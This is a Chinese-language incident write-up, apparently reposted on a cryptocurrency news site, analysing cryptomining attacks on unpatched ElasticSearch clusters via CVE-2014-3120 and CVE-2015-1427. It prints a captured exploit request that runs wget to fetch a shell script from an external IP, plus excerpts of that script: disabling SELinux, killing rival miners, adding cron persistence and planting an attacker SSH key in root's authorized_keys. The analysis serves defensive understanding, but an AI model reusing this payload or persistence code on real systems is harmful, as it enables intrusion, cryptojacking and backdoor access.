okx

ElasticSearch漏洞挖矿案例分析

时间:2023-06-21|浏览:159

0x00、前言

在开两会的前期,保证国家各个方面的稳定的事都提到日程上来,政府部门对互联网公司的监控也进入了严打阶段。在这样的大背景下,公司内部也对包括公共安全信息泄露做了一次大的排查,在此过程中,发现了一些案例,分享给大家。

0x01、入侵手段

对于mongodb、redis等数据库的攻击已经讲的非常多了,今天给大家分享的是针对不安全的Elasticsearch集群的攻击。这些攻击利用CVE-2014-3120和CVE-2015-1427。这两种攻击仅存在于旧版本的Elasticsearch中,并利用将脚本传递给搜索查询的能力。把有效攻击载荷存储在里面并且执行。

态势感知-网络入侵防护系统中,对相关的入侵有检测功能,策略如下:

1、ETWEB_SERVERPossibleCVE-2014-3120ElasticSearchRemoteCodeExecutionAttempt 2、ETWEB_SERVERPossibleCVE-2015-1427ElasticSearchSandboxEscapeRemoteCodeExecutionAttempt

通过入侵检测系统,可以获取到有效的入侵载荷。

"POST/_search?prettyHTTP/1.1 Host:xxx.xx.113.xxx:9200 User-Agent:Go-http-client/1.1\r\nContent-Length:208 Connection:close\r\nAccept-Encoding:gzip { "size":1, "script_fields":{ "lupin":{ "script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime.exec(\"wgethttp://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh-P/tmp/sssooo\").getText" } } }"

我们分析一下攻击载荷都干了什么事。

1、关闭SElinux,干掉现有挖矿进程

#!/bin/sh setenforce0 2>/dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null ... mv /usr/bin/wget /usr/bin/get mv /usr/bin/curl /usr/bin/url ps auxf|grep -v grep|grep "mine.moneropool.com"|awk "{print $2}"|xargs kill -9 ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk "{print $2}"|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk "{print $2}"|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk "{print $2}"|xargs kill -9 ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk "{print $2}"|xargs kill -9 ps auxf|grep -v grep|grep "monerohash.com"|awk "{print $2}"|xargs kill -9 ... pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f minexmr ...

2、在crontab添加定时升级程序,添加自己C2主机的sshkey,下载挖矿配置文件,配置防火墙、删除日志、开启反弹shell。

if [ -f "$rtdir" ] then echo "iamroot" echo "goto1" > /etc/devtools chattr -i /etc/devtool* chattr -i /etc/config.json* chattr -i /etc/update.sh* chattr -i /root/.ssh/authorized_keys* chattr -i /etc/systemctI if [ -f "/usr/bin/crontab" ] then [[ $cont =~ "update.sh" ]] || (crontab -l;echo "*/10****sh /etc/update.sh >/dev/null 2<&1")|crontab - else echo "*/10****sh /etc/update.sh >/dev/null 2<&1" >> ${crondir} fi chmod 700 /root/.ssh/ echo /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPK+J+AIJvoCX67fFzfbNU5MT816KDmggltbgEI0hKZRdmMMe1ao/3CEgIzeqGbTff1suT/F1POUjGrf5t/ZqyIJzCIBKqNsxzM4tRNxrIGrqKnZypRlXdX+uZNaxmNJZGkkmtdeseekped0WnWk5SsvbYghBn4y9lZnsO+C1EgjLNWkbRPuoo/RkWTIXDmB7M7UcfYf+sSpApACt8DRydSEkeY709WtL0aANnN057Wnp/Okv+buM4mnkuteLtZvCAySt7PVBrCKyhItZx9VX/TMegljt/UPDaKfAeWF14Q1ORLRQkzZt9k+pY/ccNNbS53OmG0NhQ/awchmgXUpsProot@vultr.guest" >> /root/.ssh/authorized_keys

热点:挖矿

« 上一条| 下一条 »
区块链交流群
数藏交流群

合作伙伴

聚币网 免费电影 谈股票 币圈ICO官网 皮卡丘资讯 元宇宙Web 美白没斑啦 币爸爸 數字黃金 装修装饰网 茶百科 减肥瘦身吧 天天财富 起名取名网 妈妈知道 百科书库 宠物丫 黄金行情 玩合约 数字财经 百悦米 非小号行情 旅游资讯网 趣玩币 培训资讯网 爱网站 二手域名 周公解梦 宝宝起名 去玩呗SPA 币圈官网 借春秋 代特币圈 今日黄金 借春秋财经 币圈交流群 秒懂域名 金色币圈 玩票票财经 趣开心资讯 币圈论坛 佩佩蛙官网 谷歌留痕 兼职信息网
在区块链世界中,智能合约不仅是代码的信任,更是商业的革命。通过了解其在供应链、版权保护等领域的应用,您将真正体验到智能合约的无限可能性
区块链世界GxPiKaQiu.com ©2020-2024版权所有 桂ICP备16002597号-2